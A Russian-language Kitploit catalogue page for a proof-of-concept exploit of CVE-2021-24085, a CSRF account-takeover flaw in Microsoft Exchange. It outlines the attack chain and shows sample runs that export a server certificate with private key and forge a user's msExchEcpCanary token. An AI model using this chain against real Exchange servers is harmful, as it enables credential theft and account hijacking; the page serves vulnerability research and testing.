Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/sourceincite/cve-2021-24085
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubsourceincite/cve-2021-24085

CVE-2021-24085

Эксплойт proof-of-concept для CVE-2021-24085: повышение привилегий на основе CSRF в Microsoft Exchange Server через подделку токена msExchEcpCanary, позволяющее захватить учетную запись.

Репозиторий
71185 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Microsoft Exchange Server msExchEcpCanary: уязвимость повышения привилегий через межсайтовую подделку запросов

Это proof-of-concept для CVE-2021-24085.

  1. poc.py загружает файл сертификата цели с закрытым ключом внутри
  2. YellowCanary генерирует csrf-токен msExchEcpCanary для конкретного пользователя на основе SID
  3. poc.js — это csrf-эксплойт для перехвата учетной записи

Я не предоставил файл malicifest.xml, но вы можете найти информацию о том, как создать вредоносный файл манифеста, из доступных ресурсов в разделе ссылок ниже.

Пример

Access the certificate with private key inside:

root@kitploit:~
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###

researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax

Now you can generate csrf tokens with YellowCanary using a target users SID:

root@kitploit:~
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax

            #====================================================
            # YellowCanary - generate msExchEcpCanary csrf tokens
            #====================================================

security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary     : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.

Ссылки:

  • https://www.mdsec.co.uk/2019/01/abusing-office-web-add-ins-for-fun-and-limited-profit/
  • https://info.phishlabs.com/blog/office-365-phishing-uses-malicious-app-persist-password-reset
Скачать инструмент